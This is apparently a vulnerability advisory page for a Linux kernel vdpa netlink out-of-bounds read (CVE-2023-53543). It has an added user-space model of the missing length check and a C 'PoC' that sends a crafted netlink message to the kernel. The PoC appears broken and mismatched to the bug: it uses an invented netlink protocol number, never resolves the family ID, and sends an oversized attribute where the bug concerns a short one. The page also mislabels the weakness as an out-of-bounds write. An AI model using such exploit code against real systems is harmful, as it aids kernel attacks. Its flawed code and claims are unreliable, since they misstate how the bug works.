Security Vulnerability Report
CVE-2023-53543 CVSS 7.8 HIGH

CVE-2023-53543

Published: 2025-10-04 16:15:49
Last Modified: 2026-03-21 00:30:49
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

vdpa: Add max vqp attr to vdpa_nl_policy for nlattr length check

The vdpa_nl_policy structure is used to validate the nlattr when parsing the incoming nlmsg. It will ensure the attribute being described produces a valid nlattr pointer in info->attrs before entering into each handler in vdpa_nl_ops.

That is to say, the missing part in vdpa_nl_policy may lead to illegal nlattr after parsing, which could lead to OOB read just like CVE-2023-3773.

This patch adds the missing nla_policy for vdpa max vqp attr to avoid such bugs.
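Why the missing policy entry matters, as an added example that is not the page's PoC or the kernel's code: a user-space model of the nla_parse attribute walk and a handler's u16 read, run on constructed messages. It assumes a hypothetical attribute id ATTR_MAX_VQP and a one-field policy (minimum payload length, 0 meaning no entry); with no entry a header-only attribute is accepted and the handler's read runs past the end of the message, while a 2-byte minimum rejects it before any handler runs.

```c
/* Added example (not the page's PoC or kernel code): a user-space model of the
 * nlattr length check an nla_policy entry gives; layout mirrors <linux/netlink.h>. */
#include <stdint.h>
#include <string.h>
#define NLA_HDRLEN   4
#define ATTR_MAX_VQP 1   /* hypothetical id standing in for the vdpa max vqp attribute */
#define ATTR_MAX     1
struct nlattr { uint16_t nla_len; uint16_t nla_type; };
struct nla_policy { uint16_t len; };   /* min payload bytes; 0 = no entry, unchecked */

/* Walk the attribute stream like nla_parse(): fill attrs[], reject short payloads. */
static int validate_attrs(const uint8_t *buf, size_t len,
                          const struct nla_policy *policy, const struct nlattr **attrs) {
    size_t off = 0;
    while (off + NLA_HDRLEN <= len) {
        const struct nlattr *a = (const struct nlattr *)(buf + off);
        if (a->nla_len < NLA_HDRLEN || off + a->nla_len > len)
            return -1;                                   /* malformed header */
        if (a->nla_type <= ATTR_MAX) {
            if (a->nla_len - NLA_HDRLEN < policy[a->nla_type].len)
                return -1;                               /* shorter than the handler needs */
            attrs[a->nla_type] = a;
        }
        off += (a->nla_len + 3u) & ~3u;                  /* NLA_ALIGN */
    }
    return 0;
}

/* Parse, then read the u16 the handler expects: -1 if rejected, else the value.
 * With policy_len == 0 a header-only attribute passes and the read runs past msg. */
static int parse_and_read(const uint8_t *msg, size_t len, uint16_t policy_len) {
    struct nla_policy policy[ATTR_MAX + 1] = { {0}, {policy_len} };
    const struct nlattr *attrs[ATTR_MAX + 1] = { 0 };
    uint16_t v;
    if (validate_attrs(msg, len, policy, attrs) < 0 || !attrs[ATTR_MAX_VQP])
        return -1;
    memcpy(&v, (const uint8_t *)attrs[ATTR_MAX_VQP] + NLA_HDRLEN, sizeof v);
    return v;
}

/* Constructed little-endian inputs. The header-only case is a 4-byte message
 * placed in an 8-byte buffer, so the out-of-message read lands on the 0xFFFF marker. */
int parse_header_only_attr(uint16_t policy_len) {
    static const uint8_t raw[8] = { 4, 0, ATTR_MAX_VQP, 0, 0xFF, 0xFF, 0, 0 };
    return parse_and_read(raw, 4, policy_len);
}
int parse_well_formed_attr(uint16_t policy_len) {
    static const uint8_t raw[8] = { 6, 0, ATTR_MAX_VQP, 0, 8, 0, 0, 0 };
    return parse_and_read(raw, 8, policy_len);
}
```

With policy_len 0 the header-only message yields the marker bytes (0xFFFF) from beyond the message; with policy_len 2 it is rejected, and the well-formed message still parses to 8 either way.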

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-787 (Out-of-bounds Write)

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 5.15.198 up to, excluding, 6.1.47)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.2 up to, excluding, 6.4.12)
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc6:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5d6ba607d6cb5c58a4ddf33381e18c83dbb4098f (fix commit)
Linux Kernel < ea65e8b5e6b1a34deda7564f09c90e9e80db436a (fix commit)
Linux Kernel < ff71709445ac033e6e250d971683110e4781c068 (fix commit)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/* CVE-2023-53543 PoC - vdpa netlink OOB read via missing nla_policy
 * This PoC demonstrates how to trigger the OOB read vulnerability
 * by sending a malicious netlink message with an oversized VDPA_ATTR_MAX_VQP attribute.
 *
 * Note: This requires local access and appropriate permissions (typically CAP_NET_ADMIN
 * or being in the netlink family's allowed group).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/genetlink.h>

#define NETLINK_VDPA 21
#define VDPA_GENL_NAME "vdpa"
#define VDPA_ATTR_MAX_VQP 5 /* Attribute type for max VQP */

struct nlmsghdr *build_netlink_message(int *msg_len)
{
    /* Allocate buffer for netlink message; the headers plus the 4096-byte
     * attribute must fit (a 4096-byte buffer would be overrun by the memset below) */
    int buf_size = 8192;
    char *buf = malloc(buf_size);
    if (!buf)
        return NULL;

    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    struct genlmsghdr *genlhdr = (struct genlmsghdr *)(buf + NLMSG_HDRLEN);

    /* Fill netlink header */
    nlh->nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN);
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_type = 0; /* Will be filled after getting family ID (never resolved in this PoC) */
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;

    /* Fill generic netlink header */
    genlhdr->cmd = 1; /* VDPA_CMD_NEW_DEV or similar */
    genlhdr->version = 1;
    genlhdr->reserved = 0;

    /* Add attribute with oversized payload to trigger OOB read */
    struct nlattr *attr = (struct nlattr *)(buf + NLMSG_HDRLEN + GENL_HDRLEN);
    attr->nla_type = VDPA_ATTR_MAX_VQP;
    /* Intentionally set an oversized nla_len to bypass validation */
    attr->nla_len = 4096; /* Much larger than expected */
    /* Fill with payload data */
    memset((char *)attr + NLA_HDRLEN, 'A', 4096 - NLA_HDRLEN);

    nlh->nlmsg_len += NLA_ALIGN(4096);
    *msg_len = nlh->nlmsg_len;
    return nlh;
}

int main(int argc, char *argv[])
{
    int sock_fd;
    struct sockaddr_nl src_addr, dest_addr;
    struct nlmsghdr *nlh;
    int msg_len;

    /* Create netlink socket */
    sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_VDPA);
    if (sock_fd < 0) {
        perror("socket creation failed");
        return -1;
    }

    /* Bind socket */
    memset(&src_addr, 0, sizeof(src_addr));
    src_addr.nl_family = AF_NETLINK;
    src_addr.nl_pid = getpid();
    src_addr.nl_groups = 0;
    if (bind(sock_fd, (struct sockaddr *)&src_addr, sizeof(src_addr)) < 0) {
        perror("bind failed");
        close(sock_fd);
        return -1;
    }

    /* Build malicious netlink message */
    nlh = build_netlink_message(&msg_len);
    if (!nlh) {
        close(sock_fd);
        return -1;
    }

    /* Send the malicious message */
    memset(&dest_addr, 0, sizeof(dest_addr));
    dest_addr.nl_family = AF_NETLINK;
    dest_addr.nl_pid = 0; /* Destination is kernel */
    dest_addr.nl_groups = 0;

    printf("Sending malicious vdpa netlink message...\n");
    if (sendto(sock_fd, nlh, msg_len, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) < 0) {
        perror("sendto failed");
        free(nlh);
        close(sock_fd);
        return -1;
    }

    printf("Message sent. Check kernel logs for OOB read or crash.\n");
    free(nlh);
    close(sock_fd);
    return 0;
}
```

References

https://git.kernel.org/stable/c/5d6ba607d6cb5c58a4ddf33381e18c83dbb4098f (Patch)
https://git.kernel.org/stable/c/ea65e8b5e6b1a34deda7564f09c90e9e80db436a (Patch)
https://git.kernel.org/stable/c/ff71709445ac033e6e250d971683110e4781c068 (Patch)
